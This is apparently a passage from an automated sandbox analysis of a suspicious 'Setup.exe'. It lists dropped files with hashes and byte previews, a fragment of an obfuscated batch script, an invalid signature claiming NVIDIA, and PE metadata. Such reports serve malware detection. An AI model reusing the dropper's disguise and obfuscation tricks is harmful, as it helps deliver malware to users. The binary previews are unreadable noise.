Preview:	VB...u;+.2......?xN..e.C..JX....k........-.m.2...%..f.._CH..}l...P.....t....Y...ZPUV\R....e...a.h......WYH.5h......B.n,...B......9...?.LNy..P>,.....F>.....pz.w.....}.....`..J.'.8F..r.....E...}.]K/....7Nu...C.G.>g.....H.].y.$.....l.ab6..vY...4c....c6A.X...Z....pp.......I..T...@Um...7".].J1(...#t.'.{O&@8..{XH.._.....J..B]..x`...?R....N.+W:...+..K.shP&9.I<..E........:.U.........aq.g._.......<u....^.c..]....k..UY...G."u..i.c\.v...@...<_.....CH.....S.6.j.?...+...b.M.Sj...^[.....Yx..A...W.9...n.1.UqBB\|.. ....^....^..y.]@.G...U.O...... ..5rME....GD.d.?..........t; 1c%L...QH...S.&p....t...K-).k..J..E.`m..(1z.,g..^,d.+...@;.p.pg3......X`.1..<.~.....`..j....q.{o.q..=......Z~...7..%....E8.....<._.&>..C,...W.R.J.v.z....D.$..6..1..S.5r.w....Gp@8.#E..`1G?..b.....>..'..`.s(s..`}TF...){Z..'....r.._.Zy... ../...7{..$&.D...HO#G...bW~M.<...FJ....9...5...........P.....=.0..3.+{0.......T&+D.....U..dIl?....6.\.&.3....j....b.EYr.xY.D..T(.~Ff........X0.:8..1.....M.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jam

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	107520
Entropy (8bit):	6.551007213686233
Encrypted:	false
SSDEEP:	3072:Wv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jf5:ophfhnvO5bLezWWt/Dd314V14ZgP0I
MD5:	D7FF83F3C5BA22021B8845ECCD4ACB8A
SHA1:	6F214B1F32BC42D655EA5C0CC77A5136CB75A78A
SHA-256:	2AB9CB438FF8550A01ABF89029FA987EBF948BD385BD0E93E4CC41044AFF1CCC
SHA-512:	D5198CA1B5F21E6DF7516AD7C79306705A38B8683D15E41094DF8AD4D9863B1DEF67930C594B657326F1E84D3E673498D66F3234CF0091A671A3311944FBED78
Malicious:	false
Preview:	..M...N.3.SS.1....:...D$(.@...x".M..D$ P....P.L$D.\$L.o...3...F..3..\$8F.t$<..j..D$..D$4X..t..L$0.S.....t..L$@.F....\$..D$...y.3.QQQP.......D$ P..p.I._^3.[..]...U......LSVW.}...G..0....M...F....D$..G..p.....M...F.3.V.t$(.D$.....D$$..p.I....u...t.I......t$.v!.G.j).H..s....t..D$.....B....D$..L$..T$8V.....Y..xJ.D$..t$.PhD.J.j.V.D$HP..X.I...y.Vh .L.Vj.........F....t$.........D$....../.G............u.Phx.L.Pj...G....%.....t...V.P..\|$..tk.D$HP.t$$..\.I...y..\|$..t...V.P.j.hP.L.j.j..y....d$...L$...Q.L$LQV....y..\|$..t...V.P.j.h .L.j..D.....V.P....t$.....v#.G.j).p....r....t.3....K...F......\$$.D$(P..l.I..d$0..d$4.j.Xf.D$(..u..D$...j(....Y..L$.QS.t$....;...M..D$0.D$(P......D$(P..p.I.3._^[..]...U......TSVW...M.h..I..\|$ .@(...D$0P..l.I..u.3.j.Xf.D$0.F..\$8.\$<....T$...............~..s.3....L.F.pjP.9...Yj.Y.D$.9N.v..N..q....J...N..u....D$....\$..F..p....uJ...E..@.........PW.t$..v.Q.L$0.G(...p...y...P.Q...SPSV..............D$8........#J...D$..H....D$ .A..D$$.A..D$(.A..L$ .D$,....}...t$$

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nervous

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	62464
Entropy (8bit):	7.997314488018094
Encrypted:	true
SSDEEP:	1536:x71eVa5hknGQO0BBFDU6oaVF00gTZzOm9Gz5:11CGe3dVFnoT45
MD5:	E5AC066620B49F8B3C369AB0126DB760
SHA1:	5C60F57B6A98D6864B121566DBCFA22B0FF9A7EE
SHA-256:	FEEBEBDD29EAF7CF43BB23B8F1620614CF7015DA6B994C6230EC1A9E9ED1E3E7
SHA-512:	FC67825B335AF0001872532EDAE609502E3321801E02B0A309912BF6054C84D5FD220120A67C59B68A507DCDB7B30B350C5E9D8D43D8A817A728028B9CB3AD3E
Malicious:	false
Preview:	p8...f...J..?P...d`X).c.;.........R..\..#A.f.3.t...Y....(.\..~....0c....Ccm.\.N.........w.u.........R.0...W.J.-.^\|...+gJ...nw?.j2........l."...~>..\|[[..y.......{.....f....].rP.f.7F.....^..SX.0.~.y.....n.....jT.'~.,....}.rke....-.^..C....1X`.1.i.Tg$...g...{..j.~....... ~...kz.....#.$..Qzo..{.{/.......v-..H...e.f.t.N..d..."+...}.T..:ycO..@..ykW.V.}.Li..m.s.a..J...cQ.....n.2..[....0..w.:.i5.k.w..T...0......H4.57..'_.N....]M".h .L..~....PT..O._;...,...Hb!..4C.D..m.bW.....f..k.(.EAl.....]..jr.>.-+....-..xfb(...Zg......;..L.....1...m..z..c.(..Qo..+...%.5t...}l...V.A e...(d.M.Y..+......H.P?,L%.Z...'.M.LhN..AD..15...a['..."....a.N.J..j..J@l^`D...qE.. ..'.@.(..g..sY..9./.m.t... Wj...=d...yr\..."~..[..v...i...K'.f.r.!..j]...[...N....e......l2.O..".8..eT:.We.\w.......XH.F..W..3...$..O...\|...hz.R5H;..M..:..O.3[f.^....P.!.p...u...&....vb4.Z.M.."kIN.x....;7..l....\|)...>B.&.V".`RS[.c......l.^.=......$.0.v..r....}.[.#\|u...P...8t..........&+.'1.\|..}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Reproduce

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	52224
Entropy (8bit):	7.996805375449421
Encrypted:	true
SSDEEP:	768:1UaJZJmwc0lwAHGsh3Yzw9x3TWrXrANeuShuPeKbut8ecsJ/2O4AaKQxg5mj:1hmryNKKQXkbShIeKadJ+VK9mj
MD5:	8C0FA6CA097656555E367C0DBB6FA34E
SHA1:	F693D09872BEB7C43BCB96FE1935FC12CDB603C2
SHA-256:	920B71B8A7DFF00888A13B9DB7DA4D6FD2DC9AA3CF3128E26A660BCFBCEFA3A1
SHA-512:	D7744D94FC24F31A9ADC6BE33A3DB5DAC5D25573B341C72BBCA9A8B50B509C1825C0EBEACDD6AC166AD8499C57395746FC102674D6D6DECAC31074B0A363504C
Malicious:	false
Preview:	.'.,.....UM....8.)oz..y..^y...L.m>.s_1.W..7U.+........U.w...`......\..b%...l.....p......d^8...d.....Qw.v..bez2.`.P.#+..I~...,.P...m......U..$....g#.?...."..J..@.b.+-n..P?'^.,n.cd..%3.p..JL..[.....IU.>....%..,....._:.h.;..Jq.,IwgiD.w.g..{..[@.....o......@.#.$.;.....I....IA...S..RLS....:.....F,......4;%..m....uT[.&...G..mr"....>yI-......i.........X(..r.L...y!.F..0,...eE.@.((..7...AZ<.U....d.&.?@...I..T\..u._A./.7.R..g.[...s....#.4.T&..+...eLk\......\$..........rwqbt.^.....Bn.$J#..U"`...0.t.5F..Y..Y..s2B48,f.<5.{.1...(.k.M...m.....SM.{..%W7....ye.Dm.Q961].A....!.o4G....$9.fG..:...../.t.s.&1.....#LS.....(.3...l.4.R.XY....B._8......ME..z.o..t... .7..6.B.F1.H_/.@.7.>..kT.tR_..%....m{sr.[..d......;...#../V...s.(.."m5c...`1.A=....b;../..Q..../..c..N.P.....lV.. ......s+9z0....'..S.{.B...k6k..x?E.4 </h.Q....x........;.....9")8'n1....2.R....._.,......q.e.......F.......N..p.J...l.._/.....x.W...........6y.DQ.b.j..h.}..p.".HH(.:._...-...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Rights

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	128000
Entropy (8bit):	6.473853306762523
Encrypted:	false
SSDEEP:	3072:sQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKp:sQaE/loUDtf0accB3gBmmL7
MD5:	D3B786C8A7964373B9397ECF6EE31D02
SHA1:	3E9A3C18DD844785B6022458AA4A0D5F4CE63258
SHA-256:	8C4F29F6F8AD409C5DC096CD82773ACC45937E4ABB086ECCF38B8A8D586685AA
SHA-512:	D05001269BBE4199777DE6A4C10C5E92F1C2D46D8365AC38657B8C32DD210532BA90F1A70F06C4BE6E8088EF623030BD00D00783E1B56F810115FD1D8F1A9F60
Malicious:	false
Preview:	.4.L.....f..8.L.....<.L...J...H.L...G...L.L.......P.L.......T.L.......X.L.....f..\.L.....`.L...J...l.L...G...p.L.......t.L.......x.L.......\|.L.....f....L.......L...J.....L...G.....L.........L.........L.........L.....f....L.......L...J.....L.\.G.....L.........L.........L.........L.....f....L.......L.L.J.....L...G.....L.........L.........L.........L.....f....L.......L.H.I.....L...H.....L.........L.........L.........L.....f....L.......L.4.I... .L...A...$.L.......(.L.......,.L.......0.L.....f..4.L.....8.L...I...D.L...G...H.L.......L.L.......P.L.......T.L.....f..X.L.....\.L.p.I...h.L.\.I...l.L.......p.L.......t.L.......x.L.....f..\|.L.......L.<.I.....L.4.I.....L.........L.........L.........L.....f....L.......L...I.....L...I.....L.........L.........L.........L.....f....L.......L. .I.....L...I.....L.........L.........L.........L.....f....L.......L...I.....L...I.....L.........L.........L.........L.....f....L.......L.\|.I.....L.V.I... .L.......$.L.......(.L.......,.L.....f..0.L.....4.L...I...@.L.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Shoppercom

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	ASCII text, with very long lines (693), with CRLF line terminators
Category:	dropped
Size (bytes):	16756
Entropy (8bit):	5.1181754955577
Encrypted:	false
SSDEEP:	192:AWMIS0wPmwUwureeIwyKUnLkmi93gM9ZhfkZIC1LVcb1cvb7xGEk4AwhWjAErF7m:AWRazUwQJuLhq3dZNGVe1c6jPHzGbfks
MD5:	D73B6F41F80E6986864A6243EEB10B7C
SHA1:	39F1BC5E9B35E979C6A329BDDD4177729D75ED56
SHA-256:	65A0BAC7738384BD2DD3FAE715AA3E46C7AB37E85241D5FE9B848952EBF80FF6
SHA-512:	401B55C19815A7A1512CE1DE3298212F173308475C8B6B54F40CACF7BD7F804090100B361AC59FE95A631CE45CBD940FEB37C5C4833E4EAFD7C28B29E06F3BD9
Malicious:	false
Preview:	Set Bottle=E..vlyrPilot-Text-Consult-..sTKFill-Particular-Ed-Lucas-Josh-Copyright-Kelly-Community-..UdkbJones-Fascinating-Labour-Checks-Revolutionary-Kills-Critics-..BoLTroy-Blue-Passion-Feeling-..VcYWear-Wish-Carroll-Nashville-Science-Willow-Retail-Jeff-Emission-..RPYcTracking-Commonly-Brick-Credit-Pee-Acres-Boolean-Camps-..rgxBFiji-Goals-Snake-Join-Secondary-Lens-..Set Blocking=Z..MuUcCuisine-Viewer-Rapid-Phrase-Sail-Living-Indonesia-Market-Terminology-..ybCome-Finish-Workflow-Gathered-Latest-Treated-Guns-..SITranslate-Submission-Thumbnails-Conferences-Accordance-Proprietary-Accurately-..hdIraq-Spreading-Execution-..BOPublication-Postal-Nj-Dramatic-Frozen-Experience-..NaWash-Agencies-Under-Frost-Edinburgh-Zum-..VGhCDepend-Searching-..vVCertified-Aruba-Discs-Gps-Ot-Kissing-Ceramic-Wonder-..HmSupported-Delivers-Fighter-Grams-Flexible-Denmark-..Set Pray=5..iKNextel-Mounting-Owner-Glossary-Committed-Contractor-Rebecca-Hollow-Expense-..VgNSpies-Tractor-Improvement-Strengthen-Player-..VZEc

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Shoppercom.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (693), with CRLF line terminators
Category:	dropped
Size (bytes):	16756
Entropy (8bit):	5.1181754955577
Encrypted:	false
SSDEEP:	192:AWMIS0wPmwUwureeIwyKUnLkmi93gM9ZhfkZIC1LVcb1cvb7xGEk4AwhWjAErF7m:AWRazUwQJuLhq3dZNGVe1c6jPHzGbfks
MD5:	D73B6F41F80E6986864A6243EEB10B7C
SHA1:	39F1BC5E9B35E979C6A329BDDD4177729D75ED56
SHA-256:	65A0BAC7738384BD2DD3FAE715AA3E46C7AB37E85241D5FE9B848952EBF80FF6
SHA-512:	401B55C19815A7A1512CE1DE3298212F173308475C8B6B54F40CACF7BD7F804090100B361AC59FE95A631CE45CBD940FEB37C5C4833E4EAFD7C28B29E06F3BD9
Malicious:	false
Preview:	Set Bottle=E..vlyrPilot-Text-Consult-..sTKFill-Particular-Ed-Lucas-Josh-Copyright-Kelly-Community-..UdkbJones-Fascinating-Labour-Checks-Revolutionary-Kills-Critics-..BoLTroy-Blue-Passion-Feeling-..VcYWear-Wish-Carroll-Nashville-Science-Willow-Retail-Jeff-Emission-..RPYcTracking-Commonly-Brick-Credit-Pee-Acres-Boolean-Camps-..rgxBFiji-Goals-Snake-Join-Secondary-Lens-..Set Blocking=Z..MuUcCuisine-Viewer-Rapid-Phrase-Sail-Living-Indonesia-Market-Terminology-..ybCome-Finish-Workflow-Gathered-Latest-Treated-Guns-..SITranslate-Submission-Thumbnails-Conferences-Accordance-Proprietary-Accurately-..hdIraq-Spreading-Execution-..BOPublication-Postal-Nj-Dramatic-Frozen-Experience-..NaWash-Agencies-Under-Frost-Edinburgh-Zum-..VGhCDepend-Searching-..vVCertified-Aruba-Discs-Gps-Ot-Kissing-Ceramic-Wonder-..HmSupported-Delivers-Fighter-Grams-Flexible-Denmark-..Set Pray=5..iKNextel-Mounting-Owner-Glossary-Committed-Contractor-Rebecca-Hollow-Expense-..VgNSpies-Tractor-Improvement-Strengthen-Player-..VZEc

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Since

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	30544
Entropy (8bit):	7.993277707524618
Encrypted:	true
SSDEEP:	768:8gUo0Ao6fscNBm+oOIQdEZiU2be3pW3ILe/3yBn4icO:nUDAVXNFdEU/bx313+4i7
MD5:	A76D4AC3D3C2118FBAC25F04D7BABBAB
SHA1:	523CFAFB6EA284A818DBF3AEFFF0972E5FE5C27C
SHA-256:	D9A0C94913DFB103CA17A5A7EC4411F0B5D7C0120D0A2A9B737DEBE089EDEBD4
SHA-512:	624694AC5BF9FCC40B5B8B762197C9221087F77A1F8F469C81513057C5E468C69E95DB1A43379DB21C0DF067FE01FD0E11411EAE4FFE9167A5F2337E43EB3B94
Malicious:	false
Preview:	).A!.t."m\|.../M\|....!k...P....DW..w.~7......_\R.....#t.....B...@.^W.8(..>t.6..r.pt&as..2.4.~...5 ..)9{..Q...<Y...-....#?.F..-0..Dg..0....}.ly...3.'@.p...m5(W^...].b.V......X..V.L.....7SF\|5...`....t..u..1..9.?&..x%........"=..!..Ny'M.o...z.."...VA.P.A..j.aN^.Z.......)l.G........mg..C.....H....s7...}`...]@.u.M.f...5..:h$2..1.N.....,7C......5.DZ7...w.Z..%V.a.Go..g..............:1`..:.DJT..\|.".5..H...XDd...PW.9.i&...6ZU&J[.J.._......cJ..0[.lC.y.$`..q.h........K.o\,....k.:8g.INt.;5.....Iy. ,T[&.y..Z.5...u...lU..y.?....K~.FQ........^y........0.`....$...6........O.i....U...p...8..:.&}.. ..;..7L...(^]Q....C._/.I.l..{.......o.W.......37.n..2.....^wnm$..K-..T....1..v..s.\.#.>.-.Y.i......YO.w4....P.LNR"X\I@r.8{.{x..%....I...]}.."....g&...9..?<.6..>....._.....da..r1I..Bh.........\|m8......T0..8.9s2...X....u.CL.7... l.A.N.u..2. 0..Hir...D'.)WMz.,O>UI?...",.xP.n.s..e.&.....).m.k=.t#...Men._..C..nV..u..]#.nC.G)UMy...;...?..#.(......;..te%......1.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Stockings

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	1266
Entropy (8bit):	3.8694532747162507
Encrypted:	false
SSDEEP:	12:qyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VH4aA:qyGS9PvCA433C+sCNC1skNkvQfhSHA
MD5:	8706D63E83B1A0EEAE2CC8F8CBA26FBC
SHA1:	A4E8B3ABE0985FBA300FF567FC641D3B1902A9E4
SHA-256:	158065997F7AB6D1C9FCCCB4413E0F678C4E2BF0E46D464AD886EB4578D05917
SHA-512:	F07B154C75182CE4138A7232C2538D34AE46514126ABAA67CFA3C16272287B977329205361B244B2197BB63B2150AF924A3F54A3C5962AE72E155C7E052871F4
Malicious:	false
Preview:	Findarticles........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B....................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Surfing

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	6.592551082930642
Encrypted:	false
SSDEEP:	1536:M2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynB6GMKg:M2u5hVOoQ7t8T6pUkBJR8CThpmESv+Az
MD5:	ECCE831A6923C3FF5A1CBB64E87330CA
SHA1:	6E893E2AEC88CBF3F5263AE345654AB061B4A97A
SHA-256:	5E4C9387DB85CC5DC6B63BF35AC8F7EB8DE36A2295B30626C2F0366A4AFF313B
SHA-512:	2544D7278BFEC0B4C9EE88EF345D3ED6FC99D789C60A527D8A7AAB14D44EE638A9888834ADFCAB3BFDE1DC51C62521F26DEAF8227ED0A37E01367A03EBFBE65B
Malicious:	false
Preview:	@.]...f;U......@......@.U......<SV.u...W..\$$.....V..B..2.D$..D$,.B..D$0.B..t$(.D$4...}........hPwL..L$<.....3.W.t$@.t$@.t$.V..!....L$8............tI.E..x..u8.@....x..u....L$$P.....M.3.....1....$...F............j._.....h`wL..L$<.Q...W.t$@.t$@.t$.V.!....L$8...........tN.L$$.D$....I..\|$.P.t$..\|$..\|$ .....M..D$.P....T...L$..t$.......t$..=?..Y.W...hlwL..L$<.....W.t$@.t$@.t$.V.. ....L$8............tN.E.3.C9X...1....@....x..u....L$$P........E......0..t...#........#...>.^......h\|wL..L$<.K...W.t$@.t$@.t$.V.z ....L$8..................E..x.........@....x..u....L$.Q.L$(P......p.E..t?.D$$3.P.D$,.\|$(P...+.....t..H(.....t..E....=.....M.P...Q....+.E..t".E..@....x..u...3...WP.D$0P......3.G.L$(......._^[..]...U...(SV..M.W.i....C.3..x...~^.C..@.......y..u(.A .e...E.A$.M..E..E.P.E...........M....A.P.M.. ....M..E.P.....M..p"..F;.\|._^[....U..VWj....[....}......u..f....E...P.w.........E.P.....RP....+....t..M.QP...........2._^]...U..SV.u...W.>.V...t..W...t.......u..E....C.....N(..t.Q

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9742401645871785
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Setup.exe
File size:	1'131'073 bytes
MD5:	85a94e425d3175ef500be48d4c9d3603
SHA1:	b6ffa5150169b46a5f7dee493cca1575bb16c881
SHA256:	37e0cbc1d55da58b1dcb1665c0c38f87c532cf7c3743216a39ef8158781f75b4
SHA512:	b62056f169cd0777dfcf08fc16c03014472a32039bc3973a46dcfd9e43fe4277e62cf9648137171b39425f9f67ed5f2c346f9aa4e50cfaec815e14b0c37bd2e5
SSDEEP:	24576:DuPkVqms2Z3TsZ6R1P0qKvxxAeqKIOgZDmwdwng:S2NsuQ6DPkxx6QGmwCg
TLSH:	8835339948684DF6FB620F3418722B37AFB8FD583B91458BD360CA4F7564BC99A5C203
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n.......B...8.....

File Icon


Icon Hash:	71f0dab8b4b2f070

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007F861CBFC49Bh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007F861CBFC17Dh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007F861CBFC16Bh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007F861CBF9A6Ah
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007F861CBFBE41h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F861CBF9AF3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F861CBF9A6Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0xff82	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x111c19	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0xff82	0x10000	d2720103b8cffdb60128c5c85a1dfa08	False	0.9012298583984375	data	7.5931329485675505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x104000	0xf32	0x1000	3d0e36bae549eeb243d57f2fc412fa81	False	0.600341796875	data	5.524900619726115	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf4250	0x9259	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.0005605231549446
RT_ICON	0xfd4ac	0x293f	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0010417653186854
RT_ICON	0xffdec	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.6238812042310822
RT_ICON	0x102454	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.6659836065573771
RT_ICON	0x10357c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7801418439716312
RT_DIALOG	0x1039e4	0x100	data	English	United States	0.5234375
RT_DIALOG	0x103ae4	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x103c00	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x103c60	0x4c	data	English	United States	0.8026315789473685
RT_MANIFEST	0x103cac	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
